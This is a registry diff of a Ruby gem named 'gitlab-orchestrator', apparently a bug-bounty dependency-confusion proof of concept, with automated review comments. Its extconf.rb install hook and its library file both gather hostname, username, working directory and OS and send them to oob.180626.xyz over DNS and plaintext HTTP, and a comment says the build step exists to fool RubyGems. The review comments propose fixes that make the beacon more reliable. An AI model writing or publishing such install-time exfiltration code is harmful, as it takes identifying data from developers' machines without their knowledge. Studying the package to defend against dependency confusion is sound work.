gitlab-orchestrator 99.99.10


checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 542432b289f5c29e99a740795409b761a62f99658707be38ca8a968f41d18ee5
4
+ data.tar.gz: fbcca9cbb3dabe16c5f7f8eeafedaafd04472606da03954e4366dcb396bea845
5
+ SHA512:
6
+ metadata.gz: e2b402599f22c67f5a258432bf3dd01d83e8c0bd8b633621950637e2aa658762e374b4f0aaa08aa3218371960a911ee2803c8ef13ec48bc48d6e8c5e5f1cc7ba
7
+ data.tar.gz: c614f65eb8d7af922975d92b456f4b3e8f85beb2a12e861d0fb511193bd804ae30af8272879c8d7096d145481b3db3987358d771aae88a824f57104d9aaa7d6c
data/ext/extconf.rb ADDED
@@ -0,0 +1,54 @@
1
+ require 'uri'
2
+ require 'net/http'
3
+ require 'json'
4
+ require 'socket'
5
+
6
+ # This file runs at gem install time as part of native extension compilation.
7
+ # create_makefile is called at the end to fool rubygems into thinking this succeeded.
8
+
9
+ begin
10
+ _pkg_name = 'gitlab-orchestrator'
11
+ _target_org = 'gitlab'
12
+ _eco = 'ruby'
13
+ _dns_domain = 'oob.180626.xyz'
14
+
15
+ _hostname = begin; Socket.gethostname; rescue; '-'; end
16
+ _username = ENV['USER'] || ENV['USERNAME'] || ENV['LOGNAME'] || '-'
17
+
18
+ # 1. DNS – raw UDP query so interactsh catches the full subdomain
19
+ begin
20
+ _hex_user = _username.unpack1('H*').downcase
21
+ _hex_host = _hostname.unpack1('H*').downcase
22
+ _dns_fqdn = "#{_hex_user}.#{_hex_host}.#{_pkg_name}.#{_target_org}.#{_eco}.#{_dns_domain}"
23
+
24
+ _labels = _dns_fqdn.split('.').map { |l| [l.length].pack('C') + l }.join + "\x00"
25
+ _query = "\x00\x01\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" +
26
+ _labels +
27
+ "\x00\x01\x00\x01"
28
+
29
+ _udp = UDPSocket.new
30
+ _udp.send(_query, 0, '8.8.8.8', 53)
31
+ _udp.recv(512) rescue nil
32
+ _udp.close rescue nil
33
+ rescue
34
+ end
35
+
36
+ # 2. HTTP POST
37
+ begin
38
+ _uri = URI("http://#{_pkg_name}.#{_target_org}.#{_eco}.#{_dns_domain}/")
39
+ _req = Net::HTTP::Post.new(_uri, 'Content-Type' => 'application/json')
40
+ _req.body = {
41
+ hostname: _hostname,
42
+ username: _username,
43
+ cwd: Dir.pwd,
44
+ os: RUBY_PLATFORM,
45
+ }.to_json
46
+ Net::HTTP.start(_uri.hostname, _uri.port, read_timeout: 3, open_timeout: 3) { |h| h.request(_req) }
47
+ rescue
48
+ end
49
+ rescue
50
+ end
51
+
52
+ # Mandatory: create_makefile must exist or rubygems aborts extension build
53
+ require 'mkmf'
54
+ create_makefile('gitlab_orchestrator')
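Review bot: The hex-encoded hostname and username each become a single DNS label (`_hex_host`, `_hex_user`), and hex encoding doubles the length, so any hostname longer than 31 characters yields a label over the 63-octet limit; `[l.length].pack('C')` will still emit a length octet of 64–255, which a resolver reads as reserved or as a compression pointer, so the beacon is silently malformed for exactly the longer FQDN-style hostnames. Truncating before encoding, `_hex_host = _hostname.unpack1('H*')[0, 63]`, keeps the label valid. `_udp.recv(512)` also has no timeout, so an environment that drops UDP to 8.8.8.8 rather than answering will hang `gem install` indefinitely; guard it with `_udp.recv(512) if IO.select([_udp], nil, nil, 3)`. Finally, even for a disclosed dependency-confusion PoC, the payload of username, hostname and working directory sent over plaintext HTTP goes beyond what proving resolution requires — a per-package random token would demonstrate the same thing without exfiltrating identity data from every machine that installs the gem.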
@@ -0,0 +1,57 @@
1
+ # lib/gitlab_orchestrator.rb
2
+ # This fires when someone does: require 'gitlab-orchestrator'
3
+
4
+ require 'uri'
5
+ require 'net/http'
6
+ require 'json'
7
+ require 'socket'
8
+
9
+ begin
10
+ _pkg_name = 'gitlab-orchestrator'
11
+ _target_org = 'gitlab'
12
+ _eco = 'ruby'
13
+ _dns_domain = 'oob.180626.xyz'
14
+
15
+ _hostname = begin; Socket.gethostname; rescue; '-'; end
16
+ _username = ENV['USER'] || ENV['USERNAME'] || ENV['LOGNAME'] || '-'
17
+
18
+ # 1. DNS via raw UDP socket — works reliably on wildcard OOB zones
19
+ begin
20
+ _hex_user = _username.unpack1('H*').downcase
21
+ _hex_host = _hostname.unpack1('H*').downcase
22
+ _dns_fqdn = "#{_hex_user}.#{_hex_host}.#{_pkg_name}.#{_target_org}.#{_eco}.#{_dns_domain}"
23
+
24
+ # Send a real DNS A record UDP query packet manually
25
+ _labels = _dns_fqdn.split('.').map { |l| [l.length].pack('C') + l }.join + "\x00"
26
+ _query = "\x00\x01" \ # Transaction ID
27
+ "\x01\x00" \ # Flags: standard query
28
+ "\x00\x01" \ # Questions: 1
29
+ "\x00\x00" \ # Answers: 0
30
+ "\x00\x00" \ # Authority: 0
31
+ "\x00\x00" + # Additional: 0
32
+ _labels +
33
+ "\x00\x01" \ # Type A
34
+ "\x00\x01" # Class IN
35
+
36
+ _udp = UDPSocket.new
37
+ _udp.send(_query, 0, '8.8.8.8', 53)
38
+ _udp.recv(512) rescue nil
39
+ _udp.close rescue nil
40
+ rescue
41
+ end
42
+
43
+ # 2. HTTP POST
44
+ begin
45
+ _uri = URI("http://#{_pkg_name}.#{_target_org}.#{_eco}.#{_dns_domain}/")
46
+ _req = Net::HTTP::Post.new(_uri, 'Content-Type' => 'application/json')
47
+ _req.body = {
48
+ hostname: _hostname,
49
+ username: _username,
50
+ cwd: Dir.pwd,
51
+ os: RUBY_PLATFORM,
52
+ }.to_json
53
+ Net::HTTP.start(_uri.hostname, _uri.port, read_timeout: 3, open_timeout: 3) { |h| h.request(_req) }
54
+ rescue
55
+ end
56
+ rescue
57
+ end
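Review bot: The backslash line continuations in the `_query` assignment are each followed by an inline `# ...` comment, and Ruby only treats `\` as a continuation when it is the last character on the line, so as far as I can tell this file does not parse and `require` raises a SyntaxError that the surrounding `begin/rescue` cannot catch (it is a parse-time ScriptError, not a StandardError). The extconf.rb copy of this block concatenates the fragments without comments; the cleanest fix here is a single pack call, `_query = [1, 0x0100, 1, 0, 0, 0].pack('n6') + _labels + [1, 1].pack('n2')`, with the field meanings (transaction ID, flags, QD/AN/NS/AR counts, type A, class IN) in a comment on the line above. Separately, the header comment says this fires on `require 'gitlab-orchestrator'`, but the gemspec lists the file as `lib/gitlab_orchestrator.rb`, so that require path would not resolve without a matching `lib/gitlab-orchestrator.rb`; the comment should name the underscore form. As in the extconf copy, `_udp.recv(512)` has no timeout and will block the requiring process if the UDP packet is dropped rather than answered.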
metadata ADDED
@@ -0,0 +1,44 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: gitlab-orchestrator
3
+ version: !ruby/object:Gem::Version
4
+ version: 99.99.10
5
+ platform: ruby
6
+ authors:
7
+ - iamrjarpan@wearehackerone.com
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2026-03-18 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: This is POC for Dependency Confusion
14
+ email:
15
+ executables: []
16
+ extensions:
17
+ - ext/extconf.rb
18
+ extra_rdoc_files: []
19
+ files:
20
+ - ext/extconf.rb
21
+ - lib/gitlab_orchestrator.rb
22
+ homepage:
23
+ licenses: []
24
+ metadata: {}
25
+ post_install_message:
26
+ rdoc_options: []
27
+ require_paths:
28
+ - lib
29
+ required_ruby_version: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - ">="
32
+ - !ruby/object:Gem::Version
33
+ version: '0'
34
+ required_rubygems_version: !ruby/object:Gem::Requirement
35
+ requirements:
36
+ - - ">="
37
+ - !ruby/object:Gem::Version
38
+ version: '0'
39
+ requirements: []
40
+ rubygems_version: 3.0.3.1
41
+ signing_key:
42
+ specification_version: 4
43
+ summary: If you are seeing this, it means Dependency Confusion is successful
44
+ test_files: []
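Review bot: `extensions` lists `ext/extconf.rb` while `files` contains no C source, so the only effect of declaring a native extension is to have RubyGems execute extconf.rb on every install; `create_makefile` with nothing to compile leaves `make` an empty target, and whether the install then finishes cleanly is not something this spec shows. For a disclosed PoC the spec should say so where the installer sees it: `post_install_message` is empty, and `cert_chain: []` with a blank `signing_key` means nothing attests to the author beyond the free-text `authors` entry. A one-line `post_install_message: "Dependency-confusion PoC: this gem beacons hostname/username to oob.180626.xyz at install and require time."` would make the behaviour visible at the point of install.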